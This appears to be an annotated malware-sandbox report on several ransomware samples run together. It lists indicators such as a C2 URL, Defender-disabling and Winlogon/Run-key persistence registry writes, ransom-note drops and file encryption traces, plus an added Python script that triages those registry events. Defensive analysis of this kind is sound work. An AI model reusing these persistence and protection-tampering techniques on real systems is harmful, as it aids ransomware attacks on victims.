Analysis

max time kernel: 934s
max time network: 936s
platform: windows10-ltsc_2021_x64
resource: win10ltsc2021-20250314-en
resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250314-en, locale:en-us, os:windows10-ltsc_2021-x64, system
submitted: 19/04/2025, 21:02

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://bazaar.abuse.ch/browse.php?search=tag%3Alocker
Resource: win10ltsc2021-20250314-en

General

Target: https://bazaar.abuse.ch/browse.php?search=tag%3Alocker
Malware Config

Extracted: https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php
Extracted: C:\Users\Admin\Contacts\HELP_DECRYPT_YOUR_FILES.txt
Signatures

Note on reading this section: the submitted "sample" is a MalwareBazaar search URL (tag:locker), and the behavioral task went on to execute several different SHA-256-named executables fetched from it (see "Executes dropped EXE"). The signatures below therefore aggregate the behavior of multiple unrelated locker samples run in one VM; the process named with each IoC identifies which file produced it.

CryptoLocker
Ransomware family with multiple variants.

Cryptolocker family
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe"  [69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe]
  Winlogon\Shell is explorer.exe on a clean system; pointing it at the sample makes the sample the user's shell at every interactive logon.

[signature title absent in source] (1 IoC)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
Modifies Windows Defender Real-time Protection settings (3 TTPs, 4 IoCs)
  Key created      \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
  These are Group Policy locations, written directly rather than through policy processing. With Tamper Protection enabled, current Defender builds on client editions do not honor these values, so the writes are evidence of tampering intent rather than proof that protection was switched off.
UAC bypass (3 TTPs, 1 IoC)
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"  [reg.exe]
  Caveat: this signature fires on any write to EnableLUA. The value written here is 1, which leaves UAC enabled; disabling UAC would set it to 0. Treat the reg.exe write as policy tampering, not as evidence that UAC was turned off in this run.
Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Boot or Logon Autostart Execution: Active Setup (2 TTPs, 5 IoCs)
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
  Key created  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components  [explorer.exe]  (5 identical entries)
  Only key creation by explorer.exe is recorded; no Installed Components subkey or StubPath value appears in this report, so this entry alone does not establish an Active Setup persistence item.
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoC)
Run Powershell and hide display window.
  pid 1780  powershell.exe
Disables RegEdit via registry modification (1 IoC)
  Set value (int)  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"  [reg.exe]
Modifies Windows Firewall (2 TTPs, 2 IoCs)
  pid 5576  netsh.exe
  pid 4056  netsh.exe
Checks computer location settings (2 TTPs, 5 IoCs)
Looks up country code configured in the registry, likely geofence.
  Key value queried  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation  [537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe]
  Key value queried  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation  [WScript.exe]
  Key value queried  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation  [69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe]
  Key value queried  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation  [tmp2.exe]
  Key value queried  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
Credentials from Password Stores: Windows Credential Manager (1 TTPs)
Suspicious access to Credentials History.
Drops startup file (3 IoCs)
  File opened for modification  \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\winlogon.exe  [taskmgr.exe]
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
Executes dropped EXE (64 IoCs)
  pid 4496, 5360, 3708              eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe
  pid 4280                          66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe
  pid 3916                          e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe
  pid 4024, 4920                    winlogon.exe
  pid 6212                          d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe
  pid 7272, 6252, 7276, 7060, 7656  {34184A33-0407-212E-3320-09040709E2C2}.exe
  pid 5852                          537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe
  pid 14420                         d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe
  pid 15308                         69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe
  pid 19832                         a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe
  pid 19908                         tmp1.jpg  (executed as a PE despite the .jpg extension)
  pid 19984                         tmp2.exe
  pid 20104                         drpbx.exe
  pid 20148, 20232, 20312, 20392, 20472, 20556, 20636, 20716, 20796, 20880, 20960, 21040, 21120, 21200, 21280, 21356, 21444, 10336, 10416, 10500, 10576, 10660, 10740, 10820, 21552, 21632, 21716, 21796, 21876, 21956, 22036, 22116, 22196, 22276, 22360, 22452, 22540, 22624, 22704, 22788, 22920, 23240, 23376, 23496  firefox.exe  (44 processes)
Loads dropped DLL (1 IoC)
  pid 3212  msedge.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 64 IoCs; grouped by value, identical entries counted)
  Set value (str)  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\winlogon.exe"  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\Windows\\winlogon.exe"  [e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe]
  Set value (str)  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tsuchigumo.bat = "C:\\Windows\\system32\\Tsuchigumo.bat"  [reg.exe]
  Set value (str)  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileRescue = "C:\\ZeroLocker\\ZeroRescue.exe"  [d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe]
  Set value (str)  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe"  [{34184A33-0407-212E-3320-09040709E2C2}.exe]
  Set value (str)  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe"  [tmp2.exe]  (1 entry)
  Set value (str)  \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe"  [firefox.exe]  (58 identical entries written by the spawned firefox.exe processes)
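The registry writes in the WinLogon, Defender, UAC-bypass and RegEdit signatures above, together with the 64-entry Run-key list, are the events a responder would turn into detections. What follows is an added example, not part of this sandbox report or of any tool it names: it parses the report's flattened "Set value (...)" and "Key created" notation, collapses repeated identical events with a count (the 58 firefox.exe writes become one line), and applies triage rules, including the value check that the sandbox's "UAC bypass" rule does not make (EnableLUA = 1 keeps UAC on). The sample lines are constructed from the entries above with SHA-256 file names shortened to 8 hex characters; the severity labels are this example's own assumptions.

```python
"""Triage for flattened registry IoC lines from a sandbox report.

Added example, not part of the report: parses "Set value (...)" and
"Key created" lines as printed in the report, collapses identical events
with a count, and applies responder triage rules. Severities are assumptions.
"""
import re
from collections import Counter

SET_RE = re.compile(r'^Set value \((str|int)\) (\\REGISTRY\\.+?) = "(.*)" (\S+)$')
KEY_RE = re.compile(r'^(Key created|Key value queried) (\\REGISTRY\\.+) (\S+)$')

# Defender policy values that switch a protection off when set to 1.
DEFENDER_DISABLE = {"DisableAntiSpyware", "DisableBehaviorMonitoring",
                    "DisableOnAccessProtection", "DisableScanOnRealtimeEnable",
                    "DisableRealtimeMonitoring"}
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1")

# Constructed sample: one line per distinct IoC in the report, SHA-256 file
# names shortened to 8 hex chars, only 3 of the 58 identical firefox.exe writes.
SID = r"\REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000"
RUN = SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
FRFX = r'"C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe"'
SAMPLE_LINES = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\69811a6c\\69811a6c.exe" 69811a6c.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" e28b0a93.exe',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection e28b0a93.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" e28b0a93.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" reg.exe',
    "Set value (int) " + SID + r'\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe',
    "Set value (str) " + RUN + r'\Michael Gillespie = "C:\\ProgramData\\winlogon.exe" e28b0a93.exe',
    "Set value (str) " + RUN + r"\firefox.exe = " + FRFX + " firefox.exe",
    "Set value (str) " + RUN + r"\firefox.exe = " + FRFX + " firefox.exe",
    "Set value (str) " + RUN + r"\firefox.exe = " + FRFX + " firefox.exe",
    "Set value (str) " + RUN + r"\firefox.exe = " + FRFX + " tmp2.exe",
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\Windows\\winlogon.exe" e28b0a93.exe',
    "Set value (str) " + RUN + r'\Tsuchigumo.bat = "C:\\Windows\\system32\\Tsuchigumo.bat" reg.exe',
    "Set value (str) " + RUN + r'\FileRescue = "C:\\ZeroLocker\\ZeroRescue.exe" d4c62215.exe',
    "Set value (str) " + RUN + r'\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe" {34184A33-0407-212E-3320-09040709E2C2}.exe',
    "Key created " + SID + r"\Software\Microsoft\Active Setup\Installed Components explorer.exe",
    "Key created " + SID + r"\Software\Microsoft\Active Setup\Installed Components explorer.exe",
]


def parse_line(line):
    """One report line -> event dict, or None when it is not a registry event."""
    m = SET_RE.match(line)
    if m:
        vtype, path, data, proc = m.groups()
        key, name = path.rsplit("\\", 1)          # last component is the value name
        return {"action": "Set value", "vtype": vtype, "key": key, "name": name,
                "data": data.replace("\\\\", "\\"),  # report doubles backslashes in data
                "process": proc}
    m = KEY_RE.match(line)
    if m:
        action, path, proc = m.groups()
        return {"action": action, "vtype": None, "key": path, "name": None,
                "data": None, "process": proc}
    return None


def collapse(lines):
    """Group identical events in first-seen order; returns [(event, count)]."""
    counts, first = Counter(), {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        k = (ev["action"], ev["key"], ev["name"], ev["data"], ev["process"])
        first.setdefault(k, ev)
        counts[k] += 1
    return [(first[k], counts[k]) for k in first]


def classify(ev):
    """Triage rule for one event -> (severity, reason) or None."""
    key, name, data = ev["key"].lower(), ev["name"], ev["data"]
    if ev["action"] == "Key created":
        return ("info", "Active Setup key created, no component value written") if "active setup" in key else None
    if ev["action"] != "Set value":
        return None
    if key.endswith("\\winlogon") and name == "Shell":
        return None if data.lower() == "explorer.exe" else ("high", "Winlogon Shell replaced with " + data)
    if "windows defender" in key and name in DEFENDER_DISABLE and data == "1":
        return ("high", f"Defender policy {name}=1")
    if name == "EnableLUA":
        # Sandbox rule fires on any write; only 0 actually turns UAC off.
        if data == "0":
            return ("high", "UAC disabled (EnableLUA=0)")
        return ("info", f"EnableLUA written as {data}: UAC stays enabled, the write itself is the anomaly")
    if name == "DisableRegistryTools" and data == "1":
        return ("medium", "Registry editor disabled for this user")
    if key.endswith("\\currentversion\\run"):
        t = data.lower()
        if t.endswith(SCRIPT_EXT):
            return ("high", "Run key launches a script: " + data)
        if t.endswith("\\winlogon.exe") and "\\system32\\" not in t:
            return ("high", "winlogon.exe outside System32 (masquerade): " + data)
        if t.startswith(("c:\\windows\\", "c:\\program files")):
            return ("low", "Run key into a system directory: " + data)
        return ("medium", "Run key outside Windows/Program Files: " + data)
    return None


def triage(lines):
    """Collapse, classify, and return findings with the repeat count attached."""
    findings = []
    for ev, n in collapse(lines):
        hit = classify(ev)
        if hit:
            findings.append({"severity": hit[0], "reason": hit[1],
                             "process": ev["process"], "count": n})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f['severity']:6}] x{f['count']:<2} {f['process']}: {f['reason']}")
```

Run against the constructed lines this yields 13 findings from 14 distinct events: six high (the Shell replacement, two Defender policy writes, the two winlogon.exe masquerades and the .bat Run entry), five medium, and two informational, with the EnableLUA write correctly downgraded because its value is 1.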
Drops desktop.ini file(s) (27 IoCs)
  Process e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe, File opened for modification (25 files):
    C:\Users\Admin\Favorites\Links\desktop.ini
    C:\Users\Admin\Pictures\desktop.ini
    C:\Users\Public\AccountPictures\desktop.ini
    C:\Users\Public\Documents\desktop.ini
    C:\Users\Public\Downloads\desktop.ini
    C:\Users\Public\Videos\desktop.ini
    C:\Program Files\desktop.ini
    C:\Users\Admin\Contacts\desktop.ini
    C:\Users\Admin\Downloads\desktop.ini
    C:\Users\Admin\OneDrive\desktop.ini
    C:\Users\Admin\Saved Games\desktop.ini
    C:\Users\Public\Desktop\desktop.ini
    C:\Users\Public\Music\desktop.ini
    C:\Users\Public\Pictures\desktop.ini
    C:\Users\Admin\3D Objects\desktop.ini
    C:\Users\Admin\Favorites\desktop.ini
    C:\Users\Admin\Links\desktop.ini
    C:\Users\Admin\Music\desktop.ini
    C:\Users\Admin\Searches\desktop.ini
    C:\Users\Public\Libraries\desktop.ini
    C:\Users\Admin\Desktop\desktop.ini
    C:\Users\Admin\Documents\desktop.ini
    C:\Users\Admin\Videos\desktop.ini
    C:\Users\Public\desktop.ini
    C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI
  Process d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe (2 events):
    File created                  C:\Windows\assembly\Desktop.ini
    File opened for modification  C:\Windows\assembly\Desktop.ini
Enumerates connected drives (3 TTPs, 10 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only)  \??\E:  [explorer.exe]  (5 entries)
  File opened (read-only)  \??\F:  [explorer.exe]  (5 entries)
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow 299  iplogger.com
  flow 300  iplogger.com
Drops autorun.inf file (1 TTPs, 3 IoCs)
Malware can abuse Windows Autorun to spread further via attached volumes.
  File created                  C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf  [cmd.exe]
  File opened for modification  C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf  [cmd.exe]  (2 entries)
  The file is written into the sample's own extraction directory under Downloads, not onto a removable volume, and Windows has not honored autorun.inf on non-optical media since the 2011 AutoRun update; the indicator is the intent, not working propagation.
Drops file in System32 directory (2 IoCs)
  File created                  C:\Windows\system32\Tsuchigumo.bat  [cmd.exe]
  File opened for modification  C:\Windows\system32\Tsuchigumo.bat  [cmd.exe]
Suspicious use of NtSetInformationThreadHideFromDebugger (10 IoCs)
  pid 5852  537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe  (10 calls)
  ThreadHideFromDebugger stops the kernel from delivering debug events for the calling thread, a common anti-analysis measure; any debugger attached to that thread after the call sees nothing from it.
Drops file in Program Files directory (64 IoCs; list truncated in source)
  Process e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe unless noted. Two file creations stand out among the modifications: Restore-My-Files.txt written into Program Files directories by that process, and wab32.dll-Locked created by 69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe (a -Locked suffix on an existing DLL name).
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_MAKC2R-ul-oob.xrm-ms
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\ipssve.xml
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md
  File opened for modification  C:\Program Files\Java\jdk-1.8\LICENSE
  File opened for modification  C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md
  File opened for modification  C:\Program Files\Java\jre-1.8\lib\deploy\messages_es.properties
  File opened for modification  C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Inset.eftx
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-ppd.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial2-ppd.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-phn.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Retail-ppd.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwnumbered.dotx
  File created                  C:\Program Files (x86)\Common Files\System\wab32.dll-Locked  [69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe]
  File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\sk-SK\tipresx.dll.mui
  File opened for modification  C:\Program Files\Common Files\System\Ole DB\oledbjvs.inc
  File opened for modification  C:\Program Files\Google\Chrome\Application\133.0.6943.60\Locales\ca.pak
  File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\tzdb.dat
  File opened for modification  C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml
  File opened for modification  C:\Program Files\Microsoft Office\PackageManifests\AuthoredExtensions.16.xml
  File created                  C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\Restore-My-Files.txt
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-pl.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\PersonalDemoR_BypassTrial180-ppd.xrm-ms
  File opened for modification  C:\Program Files\Java\jre-1.8\legal\jdk\thaidict.md
  File opened for modification  C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-ul-phn.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-oob.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp4-ul-oob.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\WordR_Grace-ppd.xrm-ms
  File created                  C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Restore-My-Files.txt
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ppd.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ul-phn.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ppd.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-pl.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-pl.xrm-ms
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC_F_COL.HXK
  File opened for modification  C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui
  File opened for modification  C:\Program Files\Java\jre-1.8\lib\flavormap.properties
  File opened for modification  C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE
  File opened
for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ppd.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG.HXS e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\it-IT\mshwLatin.dll.mui e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Common Files\microsoft shared\ink\sv-SE\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrcommonlm.dat e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-ul-oob.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-pl.xrm-ms e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\classlist e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ppd.xrm-ms 
e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\STSLIST.CHM e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\7-Zip\License.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-GB\tipresx.dll.mui e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH.HXS e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Program Files\Common Files\microsoft shared\ink\da-DK\Restore-My-Files.txt e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Common Files\System\msadc\adcvbs.inc e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PSRCHLEX.DAT e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
Drops file in Windows directory 49 IoCs
description ioc Process
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\sets.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\autofill_bypass_cache_forms.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_584358136\typosquatting_list.pb msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_domains.list msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_etld1_domains.list msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_787291217\deny_full_domains.list msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\data.txt msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1641183958\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1961446077\typosquatting_list.pb msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_16235238\well_known_domains.dll msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\protocols.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_441743978\manifest.fingerprint msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\LICENSE msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\v1FieldTypes.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_1903774412\ct_config.pb msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_604443294\manifest.json msedge.exe
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping3212_383677895\edge_autofill_global_block_list.json msedge.exe
